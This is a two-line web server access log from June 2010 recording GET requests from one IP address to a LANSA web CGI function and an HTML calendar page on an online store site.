178.63.50.147 - - [21/Jun/2010:02:38:37 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
178.63.50.147 - - [21/Jun/2010:02:38:40 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
